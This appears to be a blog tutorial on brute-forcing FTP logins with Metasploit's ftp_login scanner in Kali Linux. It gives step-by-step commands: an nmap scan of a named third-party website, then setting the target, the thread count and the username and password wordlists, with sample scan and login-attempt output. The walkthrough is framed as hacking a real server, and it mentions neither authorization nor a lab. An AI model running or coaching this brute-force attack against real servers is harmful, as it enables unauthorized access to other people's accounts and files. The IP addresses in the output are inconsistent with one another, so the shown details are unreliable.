Hack ftp server using metasploit in kali Linux
In most servers there is a common vulnerability that is an open ftp port.It can be exploited by bruteforcing it's username and password.This is exactly what we are going to do.We will exploit a webserver with an open ftp port.There are couple of things you need to do this:
first thing you need is Msfconsole,which is ofcourse pre-installed in Kali..Second thing you need is two wordlists .If you already have then it's good else you can create you own wordlist. So create 2 wordlists of usernames and passwords.Once you have it then we are good to go.
So open your terminal and start postgresql database :
root@seven:~# service postgresql start
Start Metasploit :
First thing we need is to find ip address of your target and an open ftp port as well.So we will run a fast nmap scan to grab the both. You can run your nmap commands inside Msfconsole console so dont bother to open another terminal for nmap scan. Type the following command:
msf > nmap -F zeeroseven.com [*] exec: nmap -F zeeroseven.com Starting Nmap 6.49BETA4 ( https://nmap.org ) at Nmap scan report for zeeroseven.com (184.108.40.206) Host is up (0.43s latency). rDNS record for 220.127.116.11: ip-192-186-251-160 Not shown: 88 filtered ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh
Now we have our target.We need to find our exploit.For this attack we will use ftp_login exploit.So type the following command to search the exploit:
msf > search ftp_login Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/scanner/ftp/ftp_login normal FTP Authentication Scanner msf >
Above command will bring up ftp authentication scanner.We are going to use it.
Find out more information about ftp_login scanner with the below command.it will bring up the usage ,description and the options that you can use with this exploit.There are plenty but we hardly need 4 may be 6 options just go through all to find more information. .
msf > info auxiliary/scanner/ftp/ftp_login
Use ftp_login exploit
Just write the below command to use exploit:
msf > use auxiliary/scanner/ftp/ftp_login
Once you are inside ftp_login exploit type the below command to see how to set target.It might confuse you because there are a lot of options.We just need to use 4 of them.
msf auxiliary(ftp_login) > show options
Set your Target
now we need to set the option RHOST by giving ip address of your target.Just give the ip address of the website.
msf auxiliary(ftp_login) > set RHOSTS 18.104.22.168
Set threads it sets the speed or how much multiple processes you want to run at a time.
msf auxiliary(ftp_login) > set THREADS 40
Now here starts the real work.
Set the path of file usernames.This is where exploit will grab usernames to login.Give the right path in my case my wordlist is in desktop.
msf auxiliary(ftp_login) > set USER_FILE Desktop/usernames.txt
Now set the path of passwords list.
msf auxiliary(ftp_login) > set PASS_FILE Desktop/password.txt
Now everything is set.Run the exploit.Now it starts testing usernames and passwords if it finds username and password then it will stop testing and it displays the login sucessfull message along with username and password.
msf auxiliary(ftp_login) > exploit msf auxiliary(ftp_login) > exploit [*] 22.214.171.124:21 - Starting FTP login sweep [-] 126.96.36.199:21 FTP - LOGIN FAILED: admin:adminarea (Incorrect: )
Another thing you can do is to use a single username .So instead of using a wordlist you can use some common usernames like root,admin etc.So it will take root as the username and will search for passwords from the wordlists.
msf auxiliary(ftp_login) > set USERNAME root
That's it for this tutorial do share if helped you.